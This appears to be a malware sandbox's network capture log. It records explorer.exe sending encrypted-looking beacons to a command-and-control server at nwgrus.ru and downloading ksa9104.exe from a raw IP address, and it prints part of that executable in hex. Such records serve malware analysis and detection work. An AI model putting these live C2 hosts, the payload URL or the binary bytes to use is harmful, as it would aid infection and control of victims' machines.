                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu+4OoA2OUA!A@FqR+5$jKU:%*INR$j|A-2!hd^)UXH,m>#
                                                                Oct 12, 2024 23:28:23.271878958 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:23 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.449908190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:23.281369925 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://omekhnsmgqeu.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 362
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:23.281558990 CEST362OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 31 5e ca 95
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vu1^OkiPH_VduuqZl|H=!LH1^"ncq;T14]&JL8d+F-sz}kP@QlTV4
                                                                Oct 12, 2024 23:28:24.646559000 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:24 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.449918190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:24.654222012 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://nkkmigjawaaknrre.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 335
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:24.654232979 CEST335OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 20 01 d7 80
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[*k,vu S{LWp5sP3O$ }3,6KyT7C"GYy@8_)O$i[Ns}MYHI7
                                                                Oct 12, 2024 23:28:26.024338961 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:25 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.449929190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:28:26.037432909 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ewehlvglopwca.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 129
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:28:26.037461042 CEST129OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 61 2a a1 a8
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[+k,vua*wQSPIp\P~>,9@Yjn(
                                                                Oct 12, 2024 23:28:27.541810036 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:28:27 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.450039190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:29:36.300379992 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://gnpoohklywxdvf.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 291
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:29:36.300434113 CEST291OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 32 fc 85
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu{2~De]rf*Pb KD v\,F@0UW@CL``@:CmK:e!h>MGT3$WJ_0C3\A4W<?
                                                                Oct 12, 2024 23:29:37.672319889 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:29:37 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                37192.168.2.450040190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:29:43.644726992 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://yaiqkdhqwmycp.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 358
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:29:43.644790888 CEST358OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 0b f1 8a
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vuxZ<[pEcqC4l4?q^,_#D,UUsY.!sU^CykPa5`c3;,;01oe&Asn<51R
                                                                Oct 12, 2024 23:29:45.032691002 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:29:44 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.450041190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:29:51.693173885 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://yrsmvamryedsmns.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 225
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:29:51.693207979 CEST225OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 42 f1 8b
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu1BS=ibYdY:4HOyxLb>!JUH"Qav;Z-t8Q_w(ajE!+
                                                                Oct 12, 2024 23:29:53.060389996 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:29:52 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.450042190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:30:01.781599045 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://vdkygqlrtijypkc.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 190
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:30:01.781599045 CEST190OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 06 ef e8
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu{}La~#VmB{2c`8~n(PW3*-RFBMf(v#9uOJ
                                                                Oct 12, 2024 23:30:03.156392097 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:30:02 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.457093190.220.21.28802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:30:18.609090090 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://blhloseiscjcafeh.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 265
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:30:18.609113932 CEST265OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 05 af b5
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu2GSkQsLKPH=-x>2ff$.Eg(IE= .0ILs<Qz0?X-rSi=-}y_SY{
                                                                Oct 12, 2024 23:30:20.228813887 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:30:19 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.457094190.220.21.28802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:30:32.180901051 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ficvdttvkapihqjd.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 342
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:30:32.180929899 CEST342OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 0a c6 a9
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu2TfM:hSxvc1K3g'7D:6#efxN3<v:/VgT!(',gtgnAF@v6aJV
                                                                Oct 12, 2024 23:30:33.635618925 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:30:33 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.457095190.220.21.28802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:30:45.462446928 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://rydhygdypun.net/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 140
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:30:45.462476015 CEST140OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 57 03 f8 b8
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vuWa4vFS|PT'%ja@iXuv\K%[b~
                                                                Oct 12, 2024 23:30:46.931045055 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:30:46 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.457096190.220.21.28802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:30:59.558944941 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://tasohhqhxavd.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 299
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:30:59.558969975 CEST299OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 62 01 b2 9d
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vubFxm `~Kfv'0n9lI1IcXO:Vs?|mSXP:Q$f:1+?(/~M}!tlf{(<M>
                                                                Oct 12, 2024 23:31:01.015340090 CEST151INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:31:00 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 03 00 00 00 72 e8 84
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44981723.145.40.1644432580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-12 21:28:09 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Host: 23.145.40.164
                                                                2024-10-12 21:28:10 UTC327INHTTP/1.1 200 OK
                                                                Date: Sat, 12 Oct 2024 21:28:10 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                X-Frame-Options: DENY
                                                                X-Content-Type-Options: nosniff
                                                                Last-Modified: Sat, 12 Oct 2024 21:00:02 GMT
                                                                ETag: "3b800-6244de32f9971"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 243712
                                                                Connection: close
                                                                Content-Type: application/x-msdos-program
                                                                2024-10-12 21:28:10 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 83 69 6a 64 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*********F**********Rich*PELijd
                                                                2024-10-12 21:28:10 UTC8000INData Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c ba 41 00 68 74 77 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 77 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac a2 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 77 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 71 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac a2 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 71 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88
                                                                Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtwA+QP,t3VVVVVN3hpwASW,tVVVVV*E4ASW+tVVVVVh hHwAWP*2jqA;t$tjEP4A6,YP6SqA_^[j-Ytj
